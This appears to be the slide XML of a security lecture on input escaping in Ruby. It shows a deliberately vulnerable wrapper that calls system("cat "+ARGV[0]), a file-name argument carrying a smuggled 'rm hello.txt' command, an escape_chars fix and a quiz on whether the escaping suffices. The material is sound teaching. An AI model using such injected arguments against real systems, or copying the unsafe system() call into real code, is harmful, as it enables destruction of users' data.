              <a:defRPr sz="4600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CGI::escape(str)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139111B3-763F-26B2-0C05-7840A26D9674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="780141645"/>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7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7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4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4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47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47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47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47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47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4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build="p"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B3D2-362A-B5C5-DDEB-FC38860DD4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E0B2E3D-78F6-2D7D-D0E9-9162817977B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="820182" y="590832"/>
            <a:ext cx="2812642" cy="2812642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Shape 481">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B7A314-A5F8-E4C8-F42F-579FCDF51E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:r>
              <a:t>: Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE62F24-2767-F7C3-BC40-C12DA1750414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AD6DDC8-B62C-4FA4-20BB-EE782F2EDC0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2325985" y="8747278"/>
            <a:ext cx="19540605" cy="3222035"/>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dirty="0"/>
              <a:t>&gt; ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; rm </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>cat: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; rm </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: No such file or directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ls </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 483">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3B80BB-5DD4-A1F1-76EB-5CC66E8AEC45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19429341" y="3213484"/>
            <a:ext cx="4132006" cy="319088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l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>escape occurrences</a:t>
            </a:r>
            <a:r>
              <a:t> of ‘, “”, ; etc. in input string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 484">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052F7F42-52B4-55F5-A777-0AB1E3DCC15B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4948204" y="6843195"/>
            <a:ext cx="8255464" cy="913711"/>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dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>+ARGV[0]) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44BB3CA-63D6-FEBB-919D-579382C3FC73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957129" y="3126376"/>
            <a:ext cx="14469741" cy="378085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b="1" dirty="0"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> escape_chars(string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  pat = </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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  string.gsub(pat){|match|"\\" + match} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Shape 486">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4CD114-CB82-772E-A32F-3DD387F55CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4939801" y="6843195"/>
            <a:ext cx="13545374" cy="91371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dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>+escape_chars(ARGV[0])) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68028108-F9C5-085A-3710-6100083EA405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="451311" y="3026967"/>
            <a:ext cx="4991546" cy="3098924"/>
            <a:chOff x="451311" y="3026967"/>
            <a:chExt cx="4991546" cy="3098924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE79F27-4F3E-8984-12E6-5B3E5AF9F6ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="451311" y="3026967"/>
              <a:ext cx="3749347" cy="3098924"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:sym typeface="Helvetica Light"/>
                </a:rPr>
                <a:t>Regexes are very handy for specifying dangerous inputs, both for checking and sanitizing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F451FEC4-468B-9C57-41F3-7191CA94C6BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="3" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4200658" y="4567184"/>
              <a:ext cx="1242199" cy="9245"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>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582484744"/>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485"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="485"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="485"/>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2" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="483"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="483"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48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fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="486"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48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482">
                                            <p:bg/>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48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48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482">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="482">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="9"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build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="483" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="485" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="486"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0D334-01C4-0257-5574-9954C66C2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79715-29D4-4872-1ADA-246711298C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370114" y="625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 3: Is this escaping sufficient?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA70AEB-0DA6-61AB-EFEF-3D75E16804EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700590" y="3144027"/>
            <a:ext cx="9555240" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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dirty="0"/>
              <a:t>No, you should also escape character </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>No, some of the escaped characters are dangerous even when escaped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Both of the above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Yes, it’s all good</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{983DF622-5BA7-E4E7-BD44-366060B69475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 429">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DEDD8F-9233-D9E6-4573-27334E533D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="3722146"/>
            <a:ext cx="11429410" cy="3222035"/>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lang="mr-IN" sz="4000" b="1" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>escape_chars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>pat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t> = </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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>string.gsub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>pat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>){|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>|"\\" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
